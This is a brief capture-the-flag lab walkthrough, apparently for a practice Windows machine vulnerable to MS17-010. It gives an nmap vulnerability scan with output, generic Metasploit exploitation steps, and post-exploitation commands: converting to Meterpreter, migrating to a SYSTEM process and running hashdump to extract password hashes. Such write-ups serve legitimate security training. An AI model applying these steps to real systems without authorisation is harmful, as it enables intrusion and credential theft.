Blue

Recon

  1. scan for open ports
  2. nmap -vv -sV --script vuln <ip>
49152/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49158/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49159/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
...

Gain Access

  1. start metasploit
  2. search for exploit
  3. use <path to exploit>
  4. set RHOSTS
  5. set payload

Escalate

  1. convert shell to meterpreter
    1. background session, ctrl z
    2. use post/multi/manage/shell_to_meterpreter
    3. set required options
    4. run
  2. run getsystem to check privileges
  3. run shell to create new shell
  4. check list of running process, does service have system level privs?
  5. migrate to process that has system privilege
  6. migrate <process id>
  7. once higher process is controlled
  8. run hashdump, displays password hashes store din SAM database
Last modified 2023.11.02